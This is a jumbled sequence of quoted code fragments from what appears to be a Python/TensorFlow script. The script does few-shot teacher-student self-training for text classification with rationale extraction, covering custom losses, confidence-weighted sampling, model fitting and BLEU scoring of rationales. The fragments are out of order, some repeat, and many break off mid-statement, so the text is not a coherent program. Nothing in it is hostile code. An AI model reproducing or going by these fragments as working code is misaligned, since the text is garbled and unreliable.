tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred[1:]-y_pred[:-1]), axis=0)) #l2_loss = 0.0 #logger.info(l1_loss) return cce_loss", "'joint': rat_loss = None if 'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss", "validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='dense_3_classification_acc', patience=5, restore_best_weights=True)], sample_weight=[X_conf[:,0], X_conf[:,1:]]) if 'fine_tune_teacher' in type_:", "= task_acc #model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], y_neg_dev], verbose=0)[-3] if test_acc > max_test_acc: max_test_acc", "{} : {}\".format(i, len(indx))) indices.extend(indx) indices = np.asarray(indices) #indices = np.random.choice(len(X_unlabeled_sample['input_ids']), unsup_size, replace=False)", "axis=-1) logger.info(\"Best task acc score: {}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro'))) logger.info(\"Best token acc score: {}\".format(precision_recall_fscore_support(y_pred,", "in type_: rat_loss = None if 'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else:", "model {}: {}\".format(best_validation_loss, model.evaluate(X_dev, [y_dev[:,0],y_dev[:,1:]]))) ''' if not os.path.exists(model_file): model.save_weights(model_file) logger.info (\"Model file", "1.0, 1.0] ''' if '_noexp' in type_: loss_weights = [1.0, 0, 0, 0]", "from unlabeled set if 'uni' in sample_scheme: logger.info (\"Sampling uniformly\") if unsup_size <", "y_pred[:,1:] else: out = model.predict(X_unlabeled_sample, batch_size=64) acc, y_pred, r_acc = out[0], out[1], out[2]", "y=[y_train[:,0], y_train[:,1:]], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, restore_best_weights=True)]) # class_weight=class_weight)", "{}\".format(model_file)) model_student = model model_student.load_weights(model_file_best) if 'mtl' in type_: acc, y_pred = model_student.predict(X_test)", "'_r_' in type_: #re-weight rationales X_conf[:,1:] = np.where(log_rationale>0, log_rationale, 0.000000001) if 'norm' in", "= model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]) elif 'joint' in type_: _placeholder_labels", "\"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} else: indices = np.array([i for i in range(len(y_pred))]) acc", "type_ == 'joint': rat_loss = None if 'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2)", "''' else: logger.info(\"No sampling at the moment; choose all the unlabeled examples\") X_batch", "[y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) # class_weight=class_weight) tf.keras.backend.clear_session()", "X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] model.fit(x=X_batch, y=[y_batch[:,0], y_batch, y_batch[:, 0], np.ones(len(y_batch))], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0],", "patience=5, restore_best_weights=True)]) #, class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))])", "attention_mask_r} #mask tokens that are not rationales u-r if '_neg' in type_: X_negation_sample", "max_test_acc = 0. max_task_acc = 0. max_best_acc = 0. val_loss = 0. if", "1:]) if '_neg' in type_: X_negation_sample[\"input_ids\"][i, 1:] = np.where(y_pred[i]==0, X_negation_sample[\"input_ids\"][i, 1:], 103) X_negation_sample[\"input_ids\"][:,0]", "tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': custom_loss, 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier': custom_loss_neg}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights) X_batch['input_ids_r'],", "epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) #, sample_weight=[X_conf[:,0], X_conf[:,1:]]) elif type_", "= models.construct_teacher_mtl(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss],", "in type_: #re-weight labels X_conf[:,0] = np.where(log_probs>0, log_probs, 0.00000001) if 'norm' in type_:", "type_: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices],", "score of rationales on test set (teacher model): {} \".format(score1/len(pred))) logger.info(\"BLEU-2 score of", "on test set (student model): {} \".format(score4/len(pred))) data = [] for i in", "the unlabeled examples\") X_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]} if 'joint'", "loss_weights = [1.0, 0, 0, 0] elif '_no_suffcomp' in type_: loss_weights = [1.0,", "[y_dev[:,1:], y_dev[:,0], np.full((len(y_dev),len(labels)), 1/len(labels))] y_test_plg = [y_test[:,1:], y_test[:,0], np.full((len(y_test),len(labels)), 1/len(labels))] test_acc = model.evaluate(X_dev,", "X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} ''' probs = y_val[indices] X_conf = np.ones((len(y_batch), max_seq_length)) X_conf[:,0] =", "temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0) logger.info(\"Print acc (task) for joint {}\".format(temp)) logger.info", "y to train and dev with valid_split if valid_split > 0: train_size =", "of rationales on test set (student model): {} \".format(score4/len(pred))) data = [] for", "{}\".format(precision_recall_fscore_support(y_pred, y_test[:,1:], average='macro'))) pred, truth = [], [] #sys.exit(1) test_pred = y_pred #np.argmax(y_pred,", "\"attention_mask_r\":X[\"attention_mask_r\"][train_size:]}, y[train_size:] else: X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size]}, y[:train_size]", "if 'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) with strategy.scope():", "1 negation_mask = np.where(attention_mask_r==0, 1, 0) negation_mask[:,0] = 1 X_sample = {\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]),", "(student model): {} \".format(score3/len(pred))) logger.info(\"BLEU-4 score of rationales on test set (student model):", "instances\".format(sample_size, len(X_unlabeled[\"input_ids\"]))) indices = np.random.choice(len(X_unlabeled[\"input_ids\"]), sample_size, replace=False) if '_neg' in type_: X_unlabeled_sample, y_pred", "\"attention_mask\": X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:], \"input_ids_neg\":X[\"input_ids_neg\"][train_size:], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][train_size:], \"attention_mask_neg\":X[\"attention_mask_neg\"][train_size:]}, y[train_size:] elif 'joint' in type_:", "reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) model = models.construct_teacher_joint_neg(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob,", "== 'joint': rat_loss = None if 'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else:", "y_test[i].sum() truth_0+= max_seq_length-truth_1 pred.append(' '.join(temp_p)) truth.append(' '.join(temp_t)) for word in temp_p: if word", "in type_: y_neg_dev = np.full((len(y_dev), len(labels)), 1/len(labels)) y_neg_test = np.full((len(y_test), len(labels)), 1/len(labels)) temp", "+= (y_test[i].sum()-ct) p = tp/(tp+fp+0.0000001) r = tp/(tp+fn+0.0000001) logger.info(\"Token-level: {}\".format((tp)/(tp+(0.5*(fp+fn))))) logger.info(\"Rationale coverage (recall):", "(recall): {}\".format(r)) logger.info(\"Token Precision: {}\".format(p)) logger.info(\"Token overlap: {}\".format(tp/(tp+fp+fn))) score1, score2, score3, score4 =", "tp +=ct fn += (y_test[i].sum()-ct) p = tp/(tp+fp+0.0000001) r = tp/(tp+fn+0.0000001) logger.info(\"Token-level: {}\".format((tp)/(tp+(0.5*(fp+fn)))))", "X_batch['attention_mask_r'] = X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] model.fit(x=X_batch, y=[y_batch[:,0], y_batch, y_batch[:, 0], np.ones(len(y_batch))], shuffle=True, epochs=unsup_epochs,", "(\"Evaluating confidence on {} number of instances\".format(len(X_unlabeled[\"input_ids\"]))) X_unlabeled_sample = X_unlabeled #X_unlabeled_sample = {'input_ids':", "file saved to {}\".format(model_file)) model_student = model model_student.load_weights(model_file_best) if 'mtl' in type_: acc,", "np.ones((len(y_batch)))]) # class_weight=class_weight) if 'fine_tune_teacher' in type_: rat_loss = None if 'focal' in", "0: logger.info(model.summary()) model_file = os.path.join(model_dir, \"model_label.h5\") model_file_task = os.path.join(model_dir, \"model_task.h5\") model_file_best = os.path.join(model_dir,", "''' if '_noexp' in type_: loss_weights = [1.0, 0, 0, 0] if '_no_suffcomp'", "X_rationale_batch['attention_mask_r'] X_batch['input_ids_neg'], X_batch['token_type_ids_neg'], X_batch['attention_mask_neg'] = X_neg_rationale_batch['input_ids_neg'], X_neg_rationale_batch['token_type_ids_neg'], X_neg_rationale_batch['attention_mask_neg'] model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:], y_batch[:, 0],", "range(len(y_pred)): X_sample[\"input_ids\"][i, 1:] = np.where(y_pred[i]==0, 103, X_sample[\"input_ids\"][i, 1:]) if '_neg' in type_: X_negation_sample[\"input_ids\"][i,", "if '_r_' in type_: #re-weight rationales X_conf[:,1:] = np.where(log_rationale>0, log_rationale, 0.000000001) if 'norm'", "np.where(log_rationale>0, log_rationale, 0.000000001) if 'norm' in type_: X_conf[:,1:] = tf.nn.softmax(X_conf[:,1:], axis=0) #X_conf =", "X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices], 'input_ids_neg':X_unlabeled['input_ids_neg'][indices], 'token_type_ids_neg':X_unlabeled['token_type_ids_neg'][indices], 'attention_mask_neg':X_unlabeled['attention_mask_neg'][indices]}, y_pred[indices] elif 'joint' in", "shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=sup_batch_size*1, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)])", "tf.nn.softmax(X_conf[:,1:], axis=0) #X_conf = np.ones((len(X_batch['input_ids']), max_seq_length)) for i in range(len(cls)): X_conf[i,0] = class_weight[cls[i][0]]*X_conf[i,0]", "if '_neg' in type_: X_neg_rationale_batch = {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} '''", "'joint' in type_: out = model.predict(X_unlabeled, batch_size=64) acc, y_pred, r_acc = out[0], out[1],", "for i in range(len(cls)): X_conf[i,0] = class_weight[cls[i][0]]*X_conf[i,0] #logger.info (\"Weights {}\".format(X_conf[:10])) logger.info(\"X_connf shape: {}\".format(X_conf.shape))", "= {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]} if 'joint' in type_: X_rationale_batch =", "y_test[:,0], np.ones(len(y_test))], verbose=0) elif 'mtl' in type_: temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)", "total loss : {}\".format(counter, task_acc)) if 'mtl' in type_: class_acc = model.predict(X_test)[0] test_pred", "''' if val_loss < best_loss: best_loss = val_loss model.save_weights(model_file_best) #_student = deepcopy(model) '''", "'rationale_task_classifier': None, 'l2_distance': custom_loss}, metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.Mean(name='mean')]) #X_batch.update(X_rationale_batch) X_batch['input_ids_r'], X_batch['token_type_ids_r'], X_batch['attention_mask_r'] =", "101 X_sample[\"input_ids\"][:,0] = 101 logger.info(\"Extracted rationale from teacher model as input for task:", "= os.path.join(model_dir, \"model_task.h5\") model_file_best = os.path.join(model_dir, \"model_best.h5\") if os.path.exists(model_file): model.load_weights(model_file) #model_task.load_weights(model_file_task) best_base_model =", "+= nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 1, 0, 0)) score3 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0, 1, 0))", "'_neg' in type_: X_neg_rationale_batch = {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} else: indices", "pred[i] temp['score'] = nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with open(os.path.join(model_dir, 'rationale_output_test_'+type_+'.json'), 'w') as f: json.dump(data, f)", "= tf.nn.softmax(X_conf[:,1:], axis=0) #X_conf = np.ones((len(X_batch['input_ids']), max_seq_length)) for i in range(len(cls)): X_conf[i,0] =", "y_pred))*(1/(unsup_batch_size*gpus)) model = models.construct_teacher_joint_neg(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) loss_weights =", "hidden_dropout_prob=0.3, test_data=None, unlabeled_data=None, class_weight=None, type_=\"token\", X_dev=None, y_dev=None, task=None): #labels = [0, 1] #fix", "'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights = None", "confidence on the unlabeled set if sample_size < len(X_unlabeled[\"input_ids\"]): logger.info (\"Evaluating confidence on", "= y_val[indices] X_conf = np.ones((len(y_batch), max_seq_length)) X_conf[:,0] = np.log(probs+1e-10)*alpha ''' else: logger.info(\"No sampling", "int((1. - valid_split)*len(X[\"input_ids\"])) if '_neg' in type_: X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\":", "X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:]},", "patience=5, restore_best_weights=True)]) #, sample_weight=[X_conf[:,0], X_conf[:,1:]]) elif type_ == 'joint': logger.info(type_) def custom_loss(y_true, y_pred):", "SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) def custom_loss(y_true, y_pred): cce = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) if", "\"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size], \"input_ids_neg\":X[\"input_ids_neg\"][:train_size], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][:train_size], \"attention_mask_neg\":X[\"attention_mask_neg\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\":", "average='macro'))) logger.info(\"Model performance for task (macro/task): {}\".format(precision_recall_fscore_support(acc1, y_test[:,0], average='macro'))) val_loss = model.evaluate(X_dev, [y_dev[:,0],", "task label temp_t.append(temp[j]) pred_1 += test_pred[i].sum() pred_0+= max_seq_length-pred_1 truth_1 += y_test[i].sum() truth_0+= max_seq_length-truth_1", "logger.info(\"Printing prediction data on student model for run {}: {}\".format(counter, test_pred)) tp, fn,", "[],[], 0 temp = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] #logger.info(\"Test sample {}\".format(temp)) for j in range(0,len(test_pred[0])-1): if", "custom_loss_neg}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights) X_batch['input_ids_r'], X_batch['token_type_ids_r'], X_batch['attention_mask_r'] = X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r']", "'rationale_classifier':rat_loss, 'rationale_task_classifier': None, 'not_rationale_task_classifier': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier': None}, loss_weights=loss_weights) if counter", "tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) with strategy.scope(): loss_weights = [1.0, 1.0, 1.0, 1.0] ''' if '_noexp' in", "[y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[0] if task_acc > max_task_acc: logger.info (\"Val acc (task)", "= model_student.predict(X_test) y_pred = np.argmax(y_pred, axis=-1) acc = np.argmax(acc, axis=-1) #logger.info(\"Micro score (task):", "shape: {}\".format(y_batch.shape)) #X_batch, y_batch, X_conf = f_(tokenizer, X_unlabeled_sample, y_mean, y_var, acc, unsup_size, len(labels),", "base model based on validation loss best_base_model = None best_validation_loss = np.inf for", "X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices], 'input_ids_neg':X_unlabeled['input_ids_neg'][indices], 'token_type_ids_neg':X_unlabeled['token_type_ids_neg'][indices], 'attention_mask_neg':X_unlabeled['attention_mask_neg'][indices]}, y_pred[indices] elif 'joint' in type_: X_unlabeled_sample,", "truth[i] temp['pred'] = pred[i] temp['score'] = nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with open(os.path.join(model_dir, 'rationale_output_test_'+type_+'.json'), 'w') as", "epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) #", "tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) model = models.construct_teacher_joint_neg(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) loss_weights", "X_unlabeled #X_unlabeled_sample = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]} #logger.info (X_unlabeled_sample[\"input_ids\"][:5]) if 'joint'", "y_dev[:,0], y_neg_dev], verbose=0)[-3] if test_acc > max_test_acc: max_test_acc = test_acc test_task_acc = model.evaluate(X_test,", "y_neg_dev], verbose=0)[-3] if test_acc > max_test_acc: max_test_acc = test_acc test_task_acc = model.evaluate(X_test, [y_test[:,0],", "epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': custom_loss, 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier': custom_loss_neg}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None},", "tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) def custom_loss(y_true, y_pred): cce = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) if 'focal' in type_: cce", "sklearn.utils import shuffle from transformers import * import logging import math import models", "= np.where(log_probs>0, log_probs, 0.00000001) if 'norm' in type_: X_conf[:,0] = tf.nn.softmax(X_conf[:,0], axis=0) if", "X_conf[:,1:] = tf.nn.softmax(X_conf[:,1:], axis=0) #X_conf = np.ones((len(X_batch['input_ids']), max_seq_length)) for i in range(len(cls)): X_conf[i,0]", "# class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]]) elif '_neg' in type_ : y_neg", "Rationale using few-shot learning. This code base is adapted from UST (https://github.com/microsoft/UST) \"\"\"", "[] logger.info(test_pred) test_pred = np.argmax(tf.nn.softmax(test_pred, axis=-1), axis=-1) logger.info(\"Printing prediction data on teacher model", "= val_loss model.save_weights(model_file_best) #_student = deepcopy(model) ''' if test_acc > max_test_acc: max_test_acc =", "probs_rat = y_rat[indices] cls = list(acc[indices]) logger.info(cls) X_conf = np.ones((len(y_batch), max_seq_length)) log_probs =", "np.argmax(r_acc, axis=-1) #y_rat = y_rat[:, 1:] #y_pred = y_pred[:,1:] # sample from unlabeled", "model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0) logger.info(\"Print acc (task) for joint {}\".format(temp)) logger.info (\"Val acc", "= tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred[1:]-y_pred[:-1]), axis=0)) #l2_loss = 0.0 #logger.info(l1_loss) return cce_loss + 0.01*l1_loss + 0.01*coh_loss", "token (macro/task): {}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='macro'))) logger.info(\"Model performance for task (macro/task): {}\".format(precision_recall_fscore_support(acc1, y_test[:,0], average='macro')))", "test_acc > max_test_acc: max_test_acc = test_acc test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], y_neg_test],", "#, sample_weight_mode=\"temporal\") model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5,", "(https://github.com/microsoft/UST) \"\"\" from collections import defaultdict from sklearn.utils import shuffle from transformers import", "logger.info(cls) X_conf = np.ones((len(y_batch), max_seq_length)) log_probs = (probs+1e-10) #+(1-y_batch[:,0])*np.log(1-probs+1e-10)) log_rationale = (probs_rat+1e-10) if", "Shape: {}\".format(X_unlabeled[\"input_ids\"].shape)) strategy = tf.distribute.MirroredStrategy() gpus = strategy.num_replicas_in_sync logger.info('Number of devices: {}'.format(gpus)) #run", "n times with different initialization to select best base model based on validation", "X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\":", "loaded from {}\".format(model_file)) continue if 'mtl' in type_ : acc, y_pred = model.predict(X_unlabeled,", "if 'norm' in type_: X_conf[:,0] = tf.nn.softmax(X_conf[:,0], axis=0) if '_r_' in type_: #re-weight", "X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]}, y_pred[indices] else: logger.info (\"Evaluating", "type_: loss_weights = [1.0, 1.0, 0, 0] ''' model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':", "#mask tokens that are not rationales u-r if '_neg' in type_: X_negation_sample =", "y_batch[:,1:], y_batch[:, 0], np.full((len(y_batch),len(labels)), 1/len(labels))], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)),", "fn, fp = 0, 0, 0 pred_1, pred_0, truth_1, truth_0 = 0, 0,", "i in range(len(test_pred)): temp_p, temp_t, ct = [],[], 0 temp = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] #logger.info(\"Test", "(teacher model): {} \".format(score2/len(pred))) logger.info(\"BLEU-3 score of rationales on test set (teacher model):", "model.load_weights(model_file) logger.info (\"Model file loaded from {}\".format(model_file)) continue if 'mtl' in type_ :", "{}\".format(counter, task_acc)) if 'mtl' in type_: class_acc = model.predict(X_test)[0] test_pred = model.predict(X_test)[1] class_acc", "= 0. max_test_acc = 0. max_task_acc = 0. max_best_acc = 0. val_loss =", "X_batch['attention_mask_r'] = X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] X_batch['input_ids_neg'], X_batch['token_type_ids_neg'], X_batch['attention_mask_neg'] = X_neg_rationale_batch['input_ids_neg'], X_neg_rationale_batch['token_type_ids_neg'], X_neg_rationale_batch['attention_mask_neg'] model.fit(x=X_batch,", "custom_loss(y_true, y_pred): logger.info(y_pred) return kb.mean(y_true*y_pred, axis=-1) with strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':", "temp_p, temp_t, ct = [],[], 0 temp = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] #logger.info(\"Test sample {}\".format(temp)) for", "T=30, alpha=0.1, valid_split=0.5, sup_epochs=70, unsup_epochs=25, N_base=10, dense_dropout=0.5, attention_probs_dropout_prob=0.3, hidden_dropout_prob=0.3, test_data=None, unlabeled_data=None, class_weight=None, type_=\"token\",", "for run {}: {}\".format(counter, test_pred)) tp, fn, fp = 0, 0, 0 pred_1,", "{}\".format(task_acc)) logger.info (\"Test acc (task) {}\".format(test_task_acc)) if test_task_acc >= max_best_acc: max_best_acc = test_task_acc", "in type_ : logger.info(y_train.shape) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=sup_batch_size*gpus,", "'mtl' in type_: #model = model_student logger.info(y_batch.shape) model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:]], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev,", "'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices]}, y_pred[indices] else: X_unlabeled_sample, y_pred = {'input_ids':", "tokens that are not rationales u-r if '_neg' in type_: X_negation_sample = {\"input_ids\":", "score4 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0, 0, 1)) logger.info(\"BLEU-1 score of rationales on test", "as f: json.dump(data, f) model_student = None # model_task for epoch in range(unsup_epochs):", "out1[0], out1[1], out1[2] y_pred1 = np.argmax(y_pred1, axis=-1) acc1 = np.argmax(acc1, axis=-1) r_acc1 =", "0], np.full((len(y_batch),len(labels)), 1/len(labels))], 